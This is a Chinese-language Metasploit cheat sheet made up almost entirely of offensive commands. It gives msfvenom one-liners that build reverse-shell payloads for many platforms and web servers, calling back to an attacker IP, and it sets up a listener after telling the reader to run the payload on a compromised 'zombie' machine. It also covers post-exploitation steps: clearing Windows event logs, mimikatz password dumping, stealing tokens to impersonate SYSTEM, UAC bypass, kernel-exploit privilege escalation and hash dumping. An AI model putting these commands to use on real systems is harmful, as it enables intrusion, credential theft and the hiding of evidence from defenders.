- msfconsole 进入msf终端
- search xxx 搜索相关漏洞
- use xxx 使用漏洞模块
- info 显示某模块的详细信息
- show options 显示某模块的详细信息
- show targets 查看该模块适用的攻击目标类型
- show exploits 查看可用漏洞
- show auxiliary 查看可用辅助攻击工具
- show payloads 查看攻击载荷
- sessions -l 查看会话
-
生成可执行文件,无需进入msf终端操作
- Linux: msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击IP LPORT=监听端口 -f elf > shell.elf
- Windows: msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击IP LPORT=监听端口 -f exe > shell.exe
- Mac: msfvenom -p osx/x86/shell_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f macho > shell.macho
- ASP: msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击IP LPORT=监听端口 -f asp > shell.asp
- JSP: msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f raw > shell.jsp
- WAR: msfvenom -p java/jsp_shell_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f war > shell.war
- Python: msfvenom -p cmd/unix/reverse_python LHOST=攻击IP LPORT=监听端口 -f raw > shell.py
- Bash: msfvenom -p cmd/unix/reverse_bash LHOST=攻击IP LPORT=监听端口 -f raw > shell.sh
- Perl: msfvenom -p cmd/unix/reverse_perl LHOST=攻击IP LPORT=监听端口 -f raw > shell.pl
- PHP: msfvenom -p php/meterpreter_reverse_tcp LHOST=攻击IP LPORT=监听端口 -f raw > shell.php
- cat shell.php | pbcopy && echo '<?php ' | tr -d '\n' > shell.php && pbpaste >> shell.php
-
开启监听,以windows示例,然后将可执行文件上传到肉机上执行
- msfconsle
- msf5 > use exploit/multi/handler
- msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
- msf5 exploit(multi/handler) > set LHOST x.x.x.x
- msf5 exploit(multi/handler) > set LPORT xx
- msf5 exploit(multi/handler) > run
-
- meterpreter > background 切到后台
- meterpreter > exit 关闭会话
- meterpreter > help 帮助信息
- meterpreter > sysinfo 系统平台信息
- meterpreter > getuid 查看权限
- meterpreter > getpid 获取当前进程的pid
- meterpreter > shell 进入目标机cmd shell
- meterpreter > ps 查看当前活跃进程
-
- ps 查看当前活跃进程
- migrate <pid> 将会话移植到指定pid值进程中
-
- clearav 清除windows中的应用程序日志、系统日志、安全日志
-
- load mimikatz 加载mimikatz模块
- wdigest 获取Wdigest密码
-
- use incognito 加载窃取令牌模块
- list_tokens -u 查看可用的用户令牌
- impersonate_token 'NT AUTHORITY\SYSTEM' 假冒SYSTEM token
-
- ps 查看当前活跃进程
- steal_token <pid值> 从指定进程中窃取token
-
- meterpreter > getsystem
-
常见msf内置bypassuac模块
- exploit/windows/local/bypassuac
- exploit/windows/local/bypassuac_eventvwr
- exploit/windows/local/bypassuac_injection
- exploit/windows/local/bypassuac_injection_winsxs
- exploit/windows/local/bypassuac_silentcleanup
- exploit/windows/local/bypassuac_vbs
-
- use exploit/windows/local/bypassuac
- set session 会话ID
- run
-
利用enum_patches模块搜集补丁信息,然后寻找可利用的exploits进行提权
- run post/windows/gather/enum_patches 查看补丁信息
- background
- search MS10-015
- use exploit/windows/local/ms10_015_kitrap0d
- set session 会话ID
- run
-
- hashdump
- run post/windows/gather/smart_hashdump
-